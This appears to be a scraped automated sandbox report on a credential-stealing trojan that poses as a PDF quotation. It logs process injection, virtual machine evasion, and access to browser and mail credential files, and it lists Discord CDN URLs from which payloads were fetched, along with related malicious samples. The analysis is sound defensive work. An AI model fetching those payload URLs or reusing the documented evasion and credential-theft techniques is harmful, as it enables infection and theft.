                      Source: AppLaunch.exe, 0000000B.00000002.572594634.0000000009CF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 6A6008Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 11_2_00FC679C GetUserNameW,11_2_00FC679C

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.43e8d08.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts121
                      Windows Management Instrumentation
                      Path Interception311
                      Process Injection
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      Account Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Deobfuscate/Decode Files or Information
                      211
                      Input Capture
                      1
                      File and Directory Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      Exfiltration Over Bluetooth11
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information
                      Security Account Manager23
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      Automated Exfiltration3
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                      Software Packing
                      NTDS211
                      Security Software Discovery
                      Distributed Component Object Model211
                      Input Capture
                      Scheduled Transfer14
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets1
                      Process Discovery
                      SSH1
                      Clipboard Data
                      Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common131
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials131
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items311
                      Process Injection
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      System Owner/User Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Remote System Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Network Configuration Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1310965 Sample: QUOTATION_SEPT9FIBA00541#U0... Startdate: 19/09/2023 Architecture: WINDOWS Score: 100 30 Found malware configuration 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 7 other signatures 2->36 7 QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe 4 2->7         started        process3 signatures4 38 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->38 40 Writes to foreign memory regions 7->40 42 Allocates memory in foreign processes 7->42 44 Injects a PE file into a foreign processes 7->44 10 AppLaunch.exe 15 3 7->10         started        14 cmd.exe 1 7->14         started        16 cmd.exe 1 7->16         started        process5 dnsIp6 26 cdn.discordapp.com 162.159.129.233, 49738, 80 CLOUDFLARENETUS United States 10->26 28 162.159.134.233, 443, 49739 CLOUDFLARENETUS United States 10->28 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->46 48 Tries to steal Mail credentials (via file / registry access) 10->48 50 Tries to harvest and steal browser information (history, passwords, etc) 10->50 52 Installs a global keyboard hook 10->52 54 Uses ipconfig to lookup or modify the Windows network settings 14->54 18 conhost.exe 14->18         started        20 ipconfig.exe 1 14->20         started        22 conhost.exe 16->22         started        24 ipconfig.exe 1 16->24         started        signatures7 process8

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe100%AviraTR/Dropper.Gen
                      QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe47%ReversingLabsByteCode-MSIL.Backdoor.Androm
                      QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://cdn.discordap0%Avira URL Cloudsafe
                      https://cdn.discordappD0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn.discordapp.com
                      162.159.129.233
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exefalse
                          high
                          https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exefalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/mgravell/protobuf-netiQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/14436606/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/mgravell/protobuf-netJQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/RehAppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/11564914/23354;QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://stackoverflow.com/q/2152978/23354QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://cdn.discordapp.comAppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A66000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.discordappDAppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://github.com/mgravell/protobuf-netQUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383907625.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.383676188.00000000045DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://cdn.discordapp.comAppLaunch.exe, 0000000B.00000002.572339768.0000000006A4D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.00000000069A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://di.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exeAppLaunch.exe, 0000000B.00000002.572215304.0000000000C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.572339768.0000000006971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://cdn.discordapAppLaunch.exe, 0000000B.00000002.572339768.0000000006A30000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.159.129.233
                                                  cdn.discordapp.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  162.159.134.233
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  Joe Sandbox Version:38.0.0 Beryl
                                                  Analysis ID:1310965
                                                  Start date and time:2023-09-19 18:54:46 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 7m 26s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@13/1@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 97%
                                                  • Number of executed functions: 117
                                                  • Number of non-executed functions: 3
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tse1.mm.bing.net, displaycatalog.mp.microsoft.com, arc.msn.com, www-www.bing.com.trafficmanager.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  TimeTypeDescription
                                                  18:56:17API Interceptor203015x Sleep call for process: AppLaunch.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  162.159.129.233SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                                  64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                                                  • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  http://162.159.129.233Get hashmaliciousUnknownBrowse
                                                  • 162.159.129.233/favicon.ico
                                                  2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                  SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                  1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                  vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                  Order 4503860408.exeGet hashmaliciousAgentTeslaBrowse
                                                  • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                                                  cotizacin.docGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                                                  SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousRemcosBrowse
                                                  • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                                                  7G5RoevPnu.exeGet hashmaliciousAmadey Ficker StealerBrowse
                                                  • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                                                  70% Balance Payment.docGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                                                  TT20201712.docGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                  ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousFormBookBrowse
                                                  • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
                                                  162.159.134.233PO - Drawings And Specifications Sheet_pdf.scr.exeGet hashmaliciousAveMariaBrowse
                                                  • cdn.discordapp.com/attachments/472051232014598144/935778066171580456/Sjddks44.jpg
                                                  mvoElayshk.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
                                                  xuTyOmef1g.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
                                                  • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
                                                  VMKwliCGEP.rtfGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  cdn.discordapp.comTzhwq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.130.233
                                                  file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                  • 162.159.133.233
                                                  VOXP5aviBQ.exeGet hashmaliciousRedLineBrowse
                                                  • 162.159.135.233
                                                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                  • 162.159.135.233
                                                  file.exeGet hashmaliciousAmadey, Fabookie, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                                  • 162.159.135.233
                                                  TR23-USD-33_Incoice_of_MV_ADAMOON.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.130.233
                                                  sd3nCNrXhl.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                  • 162.159.135.233
                                                  Eozcmq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.135.233
                                                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                  • 162.159.130.233
                                                  Ldswaby.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.134.233
                                                  LrOq2OzIbC.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                  • 162.159.130.233
                                                  9hzxje3AvY.exeGet hashmaliciousFabookie, Glupteba, SmokeLoaderBrowse
                                                  • 162.159.134.233
                                                  file.exeGet hashmaliciousClipboard Hijacker, RedLineBrowse
                                                  • 162.159.130.233
                                                  854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exeGet hashmaliciousUnknownBrowse
                                                  • 162.159.129.233
                                                  854F1E97-5DBB-4AA87-A566-33D9012B095E2pdf.exeGet hashmaliciousUnknownBrowse
                                                  • 162.159.130.233
                                                  Chemco_PO_2056598.docGet hashmaliciousUnknownBrowse
                                                  • 162.159.135.233
                                                  Rzkomf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.135.233
                                                  https://cdn.discordapp.com/attachments/1149416411790327819/1149416836249690214/Hotel_Extra_Information.zipGet hashmaliciousUnknownBrowse
                                                  • 162.159.134.233
                                                  Vgtrnwhgbt.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.130.233
                                                  854F1E97-5DBB-4AD7-A566-43D9012B05E23_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.130.233
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSPO184383.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.215.45
                                                  Halkbank_Ekstre_20230918_44390_097542.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                  • 104.21.47.12
                                                  TOIXYXBFXF.pngGet hashmaliciousUnknownBrowse
                                                  • 172.64.154.107
                                                  Bank_Statement.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.135.233
                                                  thong_bao_hang_den_20233_2414458944.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.136.232
                                                  Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                  • 172.67.131.40
                                                  Ziraat_Bankasi_Swift_Mesaji.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 172.67.131.40
                                                  https://xxui87wghqwyyuw8jh00989wjwqgu.trazosconstruccion.cl/jtruckenbrod@lockton.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.2.50
                                                  http://57thandnormal.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.82.223
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.129.233
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.135.233
                                                  BL_DRAFT_AND_PACKING_LIST.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                  • 172.67.146.208
                                                  #U00d6DEME_DETAYLARI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.137.232
                                                  https://fpq68.app.link/vl1f9jtoaDbGet hashmaliciousUnknownBrowse
                                                  • 104.18.26.193
                                                  Tzhwq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.133.233
                                                  file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                  • 172.67.181.144
